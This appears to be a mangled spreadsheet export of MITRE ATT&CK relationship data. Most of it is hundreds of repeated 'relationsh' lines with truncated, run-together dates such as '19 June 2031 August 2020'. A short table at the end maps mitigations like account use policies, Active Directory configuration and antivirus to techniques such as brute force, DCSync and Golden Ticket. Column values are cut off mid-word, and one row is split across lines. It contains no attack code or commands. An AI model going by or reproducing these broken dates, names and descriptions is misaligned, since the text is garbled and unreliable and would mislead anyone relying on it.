relationsh 17 October16 March 2020
relationsh 17 October16 March 2020
relationsh 17 October16 March 2020
relationsh 17 October16 March 2020
relationsh 17 October17 March 2020
relationsh 07 March 07 March 2024
relationsh 31 August 30 November 2022
relationsh 31 August 30 November 2022
relationsh 19 June 2031 August 2020
relationsh 19 June 2022 June 2020
relationsh 31 August 30 November 2022
relationsh 19 June 2030 November 2022
relationsh 25 Septem25 September 2020
relationsh 24 March 24 March 2023
relationsh 25 Septem25 September 2020
relationsh 25 Septem05 October 2020
relationsh 19 June 2022 June 2020
relationsh 19 June 2030 November 2022
relationsh 19 June 2024 March 2023
relationsh 25 Septem25 September 2020
relationsh 19 June 2030 November 2022
relationsh 19 June 2030 November 2022
relationsh 19 June 2019 June 2020
relationsh 19 June 2019 June 2020
relationsh 25 Septem25 September 2020
relationsh 19 June 2031 August 2020
relationsh 23 June 2024 June 2020
relationsh 19 June 2030 November 2022
relationsh 19 June 2019 June 2020
relationsh 19 June 2019 June 2020
relationsh 31 August 30 November 2022
relationsh 31 August 31 August 2020
relationsh 31 August 30 November 2022
relationsh 31 August 31 August 2020
relationsh 19 June 2030 November 2022
relationsh 19 June 2025 September 2020
relationsh 19 June 2019 June 2020
relationsh 19 June 2031 August 2020
relationsh 31 August 30 November 2022
relationsh 31 August 30 November 2022
relationsh 04 August 04 August 2021
relationsh 04 August 04 August 2021
relationsh 04 August 04 August 2021
relationsh 04 August 04 August 2021
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 27 August 27 August 2024
relationsh 16 January21 March 2020
relationsh 17 October15 October 2019
relationsh 17 October10 April 2024
relationsh 17 October15 October 2019
relationsh 16 January15 October 2019
relationsh 26 March 26 March 2023
relationsh 16 January26 March 2023
relationsh 17 October26 March 2023
relationsh 17 October26 March 2023
relationsh 17 October15 October 2019
relationsh 17 October26 March 2023
relationsh 17 October15 October 2019
relationsh 17 October20 March 2020
relationsh 16 January26 March 2023
relationsh 17 October26 March 2023
relationsh 17 October26 March 2023
relationsh 16 January15 October 2019
relationsh 16 January19 March 2020
relationsh 25 March 26 March 2023
relationsh 05 March 05 March 2024
relationsh 05 March 17 April 2024
relationsh 05 March 05 March 2024
relationsh 05 March 05 March 2024
relationsh 29 March 29 March 2024
relationsh 14 Decemb26 December 2023
relationsh 30 January19 March 2020
relationsh 30 January19 March 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 18 April 2017 October 2018
relationsh 05 March 17 April 2024
relationsh 05 March 05 March 2024
relationsh 05 March 05 March 2024
relationsh 05 March 05 March 2024
relationsh 05 March 05 March 2024
relationsh 05 March 06 March 2024
relationsh 05 March 05 March 2024
relationsh 26 March 29 April 2020
relationsh 26 March 22 April 2019
relationsh 25 March 22 April 2019
relationsh 19 April 2022 April 2019
relationsh 12 April 2022 April 2019
relationsh 02 April 2022 April 2019
relationsh 26 March 20 March 2020
relationsh 26 March 22 April 2019
relationsh 26 March 22 April 2019
relationsh 26 March 27 March 2020
relationsh 26 March 22 April 2019
relationsh 02 April 2022 April 2019
relationsh 26 March 22 April 2019
relationsh 25 March 17 March 2020
relationsh 26 March 22 April 2019
relationsh 26 March 22 April 2019
relationsh 27 Decemb15 April 2022
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb07 April 2022
relationsh 07 April 2007 April 2022
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb07 April 2022
relationsh 07 April 2007 April 2022
relationsh 27 Decemb07 April 2022
relationsh 28 Novemb28 November 2023
relationsh 07 April 2014 August 2024
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb15 April 2022
relationsh 07 April 2030 June 2022
relationsh 07 April 2007 April 2022
relationsh 07 April 2007 April 2022
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb07 April 2022
relationsh 07 April 2007 April 2022
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb27 December 2021
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb27 December 2021
relationsh 27 Decemb07 April 2022
relationsh 07 April 2030 June 2022
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb07 April 2022
relationsh 07 April 2030 June 2022
relationsh 27 Decemb27 December 2021
relationsh 27 Decemb07 April 2022
relationsh 27 Decemb07 April 2022
relationsh 14 Septem14 September 2021
relationsh 14 Septem21 September 2021
relationsh 24 Septem24 September 2021
relationsh 21 May 20 14 September 2021
relationsh 24 Septem24 September 2021
relationsh 14 Septem10 April 2024
relationsh 14 Septem14 September 2021
relationsh 24 Septem27 September 2021
relationsh 21 May 20 14 September 2021
relationsh 14 Septem14 September 2021
relationsh 14 Septem14 September 2021
relationsh 24 Septem24 September 2021
relationsh 14 Septem21 September 2021
relationsh 14 Septem14 September 2021
relationsh 14 Septem14 September 2021
relationsh 14 Septem14 September 2021
relationsh 24 Septem27 September 2021
relationsh 24 Septem27 September 2021
relationsh 24 Septem24 September 2021
relationsh 24 Septem24 September 2021
relationsh 03 March 03 March 2021
relationsh 22 Februar22 February 2021
relationsh 22 Februar10 April 2024
relationsh 22 Februar22 February 2021
relationsh 22 Februar24 April 2021
relationsh 22 Februar23 February 2021
relationsh 25 March 25 March 2022
relationsh 03 March 03 March 2021
relationsh 22 Februar22 February 2021
relationsh 22 Februar22 February 2021
relationsh 03 March 06 April 2022
relationsh 22 Februar22 February 2021
relationsh 03 March 06 April 2022
relationsh 22 Februar22 February 2021
relationsh 29 Septem29 September 2020
relationsh 29 Septem30 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 06 October06 October 2020
relationsh 30 Septem09 October 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 29 Septem29 September 2020
relationsh 30 Septem30 September 2020
relationsh 29 Septem29 September 2020
relationsh 30 Septem30 September 2020
relationsh 29 Septem06 October 2020
relationsh 30 Septem30 September 2020
relationsh 29 Septem09 October 2020
relationsh 29 Septem30 September 2020
relationsh 29 Septem29 September 2020
relationsh 30 Septem30 September 2020
relationsh 29 Septem09 October 2020
relationsh 29 Septem06 October 2020
relationsh 21 Septem21 September 2021
relationsh 21 Septem21 September 2021
relationsh 21 Septem21 September 2021
relationsh 13 April 2030 November 2022
relationsh 14 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 14 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 14 March 16 September 2024
relationsh 14 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 10 April 2010 April 2022
relationsh 14 March 10 April 2022
relationsh 10 April 2016 September 2024
relationsh 14 March 30 November 2022
relationsh 10 March 30 November 2022
relationsh 14 March 16 September 2024
relationsh 31 March 16 September 2024
relationsh 10 March 10 March 2022
relationsh 14 October14 October 2022
relationsh 10 March 14 October 2022
relationsh 14 March 30 November 2022
relationsh 13 April 2030 November 2022
relationsh 14 March 16 September 2024
relationsh 10 March 30 November 2022
relationsh 10 March 14 March 2022
relationsh 13 April 2030 November 2022
relationsh 10 March 13 April 2022
relationsh 18 April 2019 March 2020
relationsh 18 April 2019 March 2020
relationsh 18 April 2019 March 2020
relationsh 18 April 2030 March 2020
relationsh 14 Decemb03 May 2019
relationsh 14 Decemb03 May 2019
relationsh 14 Decemb03 May 2019
relationsh 14 Decemb03 May 2019
relationsh 14 Decemb03 May 2019
relationsh 14 Decemb17 March 2020
relationsh 04 June 2004 June 2020
relationsh 25 June 2025 June 2020
relationsh 04 June 2004 June 2020
relationsh 25 June 2010 April 2024
relationsh 04 June 2025 June 2020
relationsh 04 June 2004 June 2020
relationsh 04 June 2025 June 2020
relationsh 25 June 2025 June 2020
relationsh 25 June 2026 June 2020
relationsh 26 June 2026 June 2020
relationsh 25 June 2025 June 2020
relationsh 25 June 2025 June 2020
relationsh 25 June 2025 June 2020
relationsh 04 June 2025 June 2020
relationsh 14 Decemb12 September 2024
relationsh 18 April 2012 September 2024
relationsh 16 January30 October 2019
relationsh 16 January11 February 2020
relationsh 16 January30 March 2020
relationsh 16 January30 October 2019
relationsh 16 January11 February 2020
relationsh 16 January11 February 2020
relationsh 16 January30 October 2019
relationsh 16 January11 February 2020
relationsh 16 January30 October 2019
relationsh 30 April 2004 May 2020
relationsh 30 April 2010 April 2024
relationsh 30 April 2004 May 2020
relationsh 30 April 2004 May 2020
relationsh 30 April 2004 May 2020
relationsh 30 April 2004 May 2020
relationsh 01 July 20 01 July 2020
relationsh 30 April 2004 May 2020
relationsh 11 January20 March 2023
relationsh 11 January20 March 2023
relationsh 11 January10 April 2024
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 14 Decemb18 March 2020
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 11 January20 March 2023
relationsh 11 January20 March 2023
relationsh 14 Decemb20 March 2023
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 11 January20 March 2023
relationsh 11 January20 March 2023
relationsh 12 January20 March 2023
relationsh 14 Decemb30 April 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Februar13 April 2023
relationsh 14 Februar14 February 2023
relationsh 23 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar10 April 2024
relationsh 14 Februar14 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 13 April 2013 April 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 23 Februar23 February 2023
relationsh 14 Februar13 April 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar13 April 2023
relationsh 23 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 23 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar14 February 2023
relationsh 14 Februar23 February 2023
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb30 March 2020
relationsh 14 Decemb16 March 2020
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb26 July 2019
relationsh 14 Decemb26 July 2019
relationsh 07 October07 October 2021
relationsh 07 October19 October 2021
relationsh 15 October18 October 2021
relationsh 06 October15 October 2021
relationsh 05 October19 October 2021
relationsh 07 October19 October 2021
relationsh 07 October15 October 2021
relationsh 07 October17 October 2021
relationsh 07 October19 October 2021
relationsh 04 October18 October 2022
relationsh 06 October14 October 2021
relationsh 04 October18 October 2022
relationsh 07 October15 October 2021
relationsh 14 October14 October 2021
relationsh 07 October19 October 2021
relationsh 07 October07 October 2021
relationsh 05 October17 October 2021
relationsh 06 October14 October 2021
relationsh 11 April 2019 April 2022
relationsh 07 October19 October 2021
relationsh 07 October18 October 2021
relationsh 19 October19 October 2021
relationsh 07 October18 October 2021
relationsh 07 October14 October 2021
relationsh 14 October17 October 2021
relationsh 07 October19 October 2021
relationsh 07 October19 October 2021
relationsh 14 October17 October 2021
relationsh 14 October17 October 2021
relationsh 14 Decemb21 March 2020
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 April 2019
relationsh 14 Decemb19 March 2020
relationsh 12 Februar19 March 2020
relationsh 04 June 2028 June 2019
relationsh 04 June 2028 June 2019
relationsh 12 Februar20 March 2020
relationsh 12 Februar28 June 2019
relationsh 12 Februar28 June 2019
relationsh 19 March 23 June 2020
relationsh 30 January28 June 2019
relationsh 30 January28 June 2019
relationsh 30 January29 March 2020
relationsh 30 January28 June 2019
relationsh 12 Februar28 June 2019
relationsh 30 January28 June 2019
relationsh 30 January28 June 2019
relationsh 30 January19 March 2020
relationsh 30 January17 March 2020
relationsh 17 June 2023 March 2023
relationsh 17 June 2010 April 2024
relationsh 17 June 2023 March 2023
relationsh 17 June 2023 March 2023
relationsh 17 June 2023 March 2023
relationsh 30 June 2023 March 2023
relationsh 04 March 29 March 2024
relationsh 29 March 29 March 2024
relationsh 04 March 17 April 2024
relationsh 11 March 29 March 2024
relationsh 04 March 29 March 2024
relationsh 04 March 17 April 2024
relationsh 04 March 29 March 2024
relationsh 04 March 04 March 2024
relationsh 04 March 04 March 2024
relationsh 14 Decemb19 January 2022
relationsh 30 Septem30 September 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 14 Decemb19 January 2022
relationsh 30 January09 December 2020
relationsh 12 Februar09 December 2020
relationsh 12 Februar17 July 2019
relationsh 30 January17 July 2019
relationsh 20 June 2017 July 2019
relationsh 30 January17 July 2019
relationsh 16 July 20 22 December 2020
relationsh 12 Februar09 December 2020
relationsh 30 January09 December 2020
relationsh 17 October17 July 2019
relationsh 12 Februar17 March 2020
relationsh 12 Februar17 January 2020
relationsh 17 March 10 January 2024
relationsh 30 January17 July 2019
relationsh 30 January17 July 2019
relationsh 30 January17 July 2019
relationsh 20 June 2017 July 2019
relationsh 12 Februar17 July 2019
relationsh 09 Decemb09 December 2020
relationsh 30 January09 December 2020
relationsh 19 April 2017 July 2019
relationsh 16 July 20 20 March 2020
relationsh 17 October09 December 2020
relationsh 20 June 2017 July 2019
relationsh 20 June 2017 July 2019
relationsh 12 Februar09 December 2020
relationsh 12 Februar09 December 2020
relationsh 17 October17 March 2020
relationsh 20 June 2009 December 2020
relationsh 19 April 2017 July 2019
relationsh 04 Septem04 September 2024
relationsh 08 August 08 August 2024
relationsh 08 August 04 September 2024
relationsh 04 Septem04 September 2024
relationsh 08 August 14 August 2024
relationsh 08 August 08 August 2024
relationsh 04 Septem04 September 2024
relationsh 08 August 08 August 2024
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2010 April 2024
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2019 March 2020
relationsh 18 April 2021 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2021 March 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 29 January16 April 2019
relationsh 22 March 22 March 2023
relationsh 18 March 18 March 2020
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January10 April 2024
relationsh 29 January28 March 2020
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 March 2020
relationsh 29 January16 April 2019
relationsh 29 January16 March 2020
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 29 January16 April 2019
relationsh 18 August 18 August 2021
relationsh 29 January16 April 2019
relationsh 29 January17 March 2020
relationsh 29 January18 March 2020
relationsh 09 January20 March 2023
relationsh 15 April 2010 April 2024
relationsh 09 January20 March 2023
relationsh 09 January20 March 2023
relationsh 09 January20 March 2023
relationsh 09 January20 March 2023
relationsh 09 January20 March 2023
relationsh 15 April 2020 March 2023
relationsh 09 January20 March 2023
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 07 January07 January 2022
relationsh 28 March 05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem23 March 2023
relationsh 05 January05 January 2022
relationsh 24 Septem23 March 2023
relationsh 17 March 05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem23 March 2023
relationsh 24 Septem05 January 2022
relationsh 07 January07 January 2022
relationsh 07 January07 January 2022
relationsh 24 Septem23 March 2023
relationsh 07 January07 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem23 March 2023
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem23 March 2023
relationsh 05 January05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem05 January 2022
relationsh 24 Septem23 March 2023
relationsh 24 Septem05 January 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2010 April 2024
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2014 October 2022
relationsh 02 June 2002 June 2022
relationsh 02 June 2002 June 2022
relationsh 18 April 2020 March 2020
relationsh 18 April 2017 March 2020
relationsh 18 April 2017 March 2020
relationsh 14 Decemb25 February 2022
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 24 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 October10 October 2022
relationsh 13 October13 October 2022
relationsh 22 Septem22 September 2022
relationsh 10 October10 October 2022
relationsh 23 Septem23 September 2022
relationsh 23 Septem23 September 2022
relationsh 23 Septem10 October 2022
relationsh 23 Septem23 September 2022
relationsh 22 Septem22 September 2022
relationsh 22 Septem22 September 2022
relationsh 23 Septem23 September 2022
relationsh 10 October10 October 2022
relationsh 03 March 12 April 2023
relationsh 14 Decemb31 July 2019
relationsh 14 Decemb31 July 2019
relationsh 14 Decemb16 August 2021
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb17 March 2020
relationsh 20 March 20 March 2020
relationsh 14 Decemb20 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb17 March 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 10 June 2024 June 2020
relationsh 14 Decemb19 December 2022
relationsh 14 Decemb19 December 2022
relationsh 14 Februar17 September 2020
relationsh 19 Decemb07 April 2023
relationsh 01 Septem01 October 2021
relationsh 28 Septem28 September 2023
relationsh 03 Septem14 September 2021
relationsh 20 March 20 March 2020
relationsh 03 Septem28 September 2023
relationsh 03 Septem05 September 2019
relationsh 14 Decemb25 February 2022
relationsh 25 Februar25 February 2022
relationsh 25 Februar07 March 2022
relationsh 14 Decemb15 July 2020
relationsh 14 Decemb29 March 2021
relationsh 18 April 2016 April 2019
relationsh 15 July 20 15 April 2022
relationsh 15 July 20 15 April 2022
relationsh 15 July 20 15 April 2022
relationsh 14 Decemb15 July 2020
relationsh 29 January29 March 2021
relationsh 14 Decemb15 July 2020
relationsh 15 July 20 15 April 2022
relationsh 15 July 20 15 April 2022
relationsh 15 July 20 15 April 2022
relationsh 14 Decemb16 April 2019
relationsh 15 July 20 15 April 2022
relationsh 15 July 20 15 April 2022
relationsh 29 January29 March 2021
relationsh 18 April 2016 April 2019
relationsh 29 January29 March 2021
relationsh 24 July 20 24 July 2020
relationsh 24 July 20 24 July 2020
relationsh 24 July 20 24 July 2020
relationsh 29 January29 March 2021
relationsh 15 July 20 15 April 2022
relationsh 29 January29 March 2021
relationsh 19 March 19 March 2020
relationsh 14 Decemb10 January 2024
relationsh 14 Decemb20 March 2020
relationsh 14 Decemb30 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb20 March 2020
relationsh 17 October30 March 2020
relationsh 17 October17 January 2020
relationsh 17 October17 January 2020
relationsh 17 October17 January 2020
relationsh 17 October17 January 2020
relationsh 17 October30 March 2020
relationsh 17 October17 January 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 June 2024 June 2019
relationsh 17 October24 June 2019
relationsh 24 April 2024 June 2019
relationsh 17 October24 June 2019
relationsh 20 March 23 June 2020
relationsh 17 October16 March 2020
relationsh 17 October24 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 17 October24 June 2019
relationsh 17 October24 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 24 April 2024 June 2019
relationsh 17 October24 June 2019
relationsh 20 March 20 March 2020
relationsh 24 April 2020 March 2020
relationsh 17 October24 June 2019
relationsh 19 October19 October 2022
relationsh 04 October18 October 2022
relationsh 04 October20 October 2022
relationsh 04 October19 October 2022
relationsh 04 October18 October 2022
relationsh 19 October19 October 2022
relationsh 04 October18 October 2022
relationsh 19 October19 October 2022
relationsh 19 October19 October 2022
relationsh 19 October19 October 2022
relationsh 16 January09 February 2021
relationsh 08 Februar05 April 2023
relationsh 05 April 2005 April 2023
relationsh 08 Februar05 April 2023
relationsh 26 January26 January 2023
relationsh 05 April 2011 April 2024
relationsh 05 April 2005 April 2023
relationsh 08 Februar05 April 2023
relationsh 08 Februar05 April 2023
relationsh 24 January05 April 2023
relationsh 05 April 2005 April 2023
relationsh 05 April 2005 April 2023
relationsh 24 January05 April 2023
relationsh 08 Februar05 April 2023
relationsh 05 April 2005 April 2023
relationsh 08 Februar05 April 2023
relationsh 08 Februar05 April 2023
relationsh 08 Februar08 February 2023
relationsh 08 Februar05 April 2023
relationsh 08 Februar08 February 2023
relationsh 31 January31 January 2023
relationsh 24 January05 April 2023
relationsh 08 Februar05 April 2023
relationsh 05 April 2005 April 2023
relationsh 05 April 2005 April 2023
relationsh 05 April 2005 April 2023
relationsh 08 Februar05 April 2023
relationsh 30 January05 April 2023
relationsh 24 January24 January 2023
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb28 March 2020
relationsh 14 Decemb28 March 2020
relationsh 14 Decemb28 March 2020
relationsh 14 Decemb28 March 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Septem14 September 2023
relationsh 14 Septem14 September 2023
relationsh 14 Septem14 September 2023
relationsh 14 Septem14 September 2023
relationsh 14 Septem14 September 2023
relationsh 05 June 2024 June 2019
relationsh 29 July 20 18 October 2022
relationsh 03 August 03 August 2020
relationsh 24 June 2024 June 2019
relationsh 05 June 2024 June 2019
relationsh 05 June 2003 August 2020
relationsh 03 August 11 April 2024
relationsh 03 August 08 October 2020
relationsh 03 August 03 August 2020
relationsh 31 January31 January 2022
relationsh 07 June 2024 June 2019
relationsh 04 June 2018 September 2023
relationsh 04 June 2016 March 2020
relationsh 05 June 2024 June 2019
relationsh 08 October08 October 2020
relationsh 03 August 08 October 2020
relationsh 05 June 2003 August 2020
relationsh 03 August 09 October 2020
relationsh 03 August 03 August 2020
relationsh 03 August 03 August 2020
relationsh 05 June 2008 October 2020
relationsh 05 June 2024 June 2019
relationsh 05 June 2024 June 2019
relationsh 05 June 2003 August 2020
relationsh 05 June 2024 June 2019
relationsh 05 June 2020 March 2020
relationsh 05 June 2024 June 2019
relationsh 05 June 2024 June 2019
relationsh 04 June 2024 June 2019
relationsh 08 October08 October 2020
relationsh 04 June 2020 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb17 March 2020
relationsh 14 Decemb13 August 2020
relationsh 14 Decemb17 October 2018
relationsh 14 Decemb28 March 2020
relationsh 18 April 2029 March 2021
relationsh 18 April 2017 October 2018
relationsh 29 Septem16 October 2021
relationsh 08 October08 October 2021
relationsh 29 Septem29 September 2021
relationsh 29 Septem08 October 2021
relationsh 29 Septem08 October 2021
relationsh 29 Septem29 September 2021
relationsh 08 October08 October 2021
relationsh 29 Septem08 October 2021
relationsh 29 Septem29 September 2021
relationsh 29 Septem29 September 2021
relationsh 29 Septem29 September 2021
relationsh 14 Decemb17 October 2018
relationsh 17 October20 March 2020
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 17 October16 March 2020
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 17 October28 March 2020
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 19 April 2016 March 2020
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 17 October25 April 2019
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
relationsh 30 January16 June 2021
source IDsource namesource refsource type
mapping typetarget IDtarget nametarget ref targetmapping
type description
M1036 Account Uscourse-of- mitigation mitigates T1550.001Applicatio attack-pat technique Where possi
M1036 Account Uscourse-of- mitigation mitigates T1110 Brute Forc attack-pat technique Set account
M1036 Account Uscourse-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Use conditi
M1036 Account Uscourse-of- mitigation mitigates T1110.004Credential attack-pat technique Set account
M1036 Account Uscourse-of- mitigation mitigates T1621 Multi-Fact attack-pat technique Enable acco
M1036 Account Uscourse-of- mitigation mitigates T1110.001Password Gattack-pat technique Set account
M1036 Account Uscourse-of- mitigation mitigates T1110.003Password Sattack-pat technique Set account
M1036 Account Uscourse-of- mitigation mitigates T1648 Serverless attack-pat technique Where possi
M1036 Account Uscourse-of- mitigation mitigates T1550 Use Altern attack-pat technique Where possi
M1036 Account Uscourse-of- mitigation mitigates T1078 Valid Acco attack-pat technique Use conditi
M1015 Active Direcourse-of- mitigation mitigates T1003.005Cached Dom attack-pat technique Consider ad
M1015 Active Direcourse-of- mitigation mitigates T1078.004Cloud Accoattack-pat technique Disable leg
M1015 Active Direcourse-of- mitigation mitigates T1003.006DCSync attack-pat technique Manage the
M1015 Active Direcourse-of- mitigation mitigates T1558.001Golden Ticattack-pat technique For contain
M1015 Active Direcourse-of- mitigation mitigates T1552.006Group Poliattack-pat technique Remove vul
M1015 Active Direcourse-of- mitigation mitigates T1003 OS Credentattack-pat technique Manage the access control lis
M1015 Active Direcourse-of- mitigation mitigates T1550.003Pass the Tiattack-pat technique To contain
M1015 Active Direcourse-of- mitigation mitigates T1606.002SAML Tokeattack-pat technique For contain
M1015 Active Direcourse-of- mitigation mitigates T1134.005SID-Historyattack-pat technique * Applying SID Filtering to do
M1015 Active Direcourse-of- mitigation mitigates T1072 Software Dattack-pat technique Ensure prop
M1015 Active Direcourse-of- mitigation mitigates T1649 Steal or Foattack-pat technique For example, consider disabli
M1015 Active Direcourse-of- mitigation mitigates T1558 Steal or Foattack-pat technique For contain
M1015 Active Direcourse-of- mitigation mitigates T1552 Unsecuredattack-pat technique Remove vul
M1015 Active Direcourse-of- mitigation mitigates T1550 Use Altern attack-pat technique Configure A
M1015 Active Direcourse-of- mitigation mitigates T1078 Valid Acco attack-pat technique Disable leg
M1049 Antivirus/ course-of- mitigation mitigates T1027.010Command aOttack-pat technique Consider u
M1049 Antivirus/ course-of- mitigation mitigates T1059 Command attack-pat
an technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1027.009Embeddedattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1027.013Encrypted/attack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1564.012File/Path Eattack-pat technique Review and
M1049 Antivirus/ course-of- mitigation mitigates T1564 Hide Artifaattack-pat technique Review and
M1049 Antivirus/ course-of- mitigation mitigates T1547.006Kernel Modattack-pat technique Common tool
M1049 Antivirus/ course-of- mitigation mitigates T1027.012LNK Icon S attack-pat technique Use signatu
M1049 Antivirus/ course-of- mitigation mitigates T1036.008Masquerade attack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1036 Masqueradattack-pat technique Anti-virus
M1049 Antivirus/ course-of- mitigation mitigates T1027 Obfuscatedattack-pat technique Anti-virus
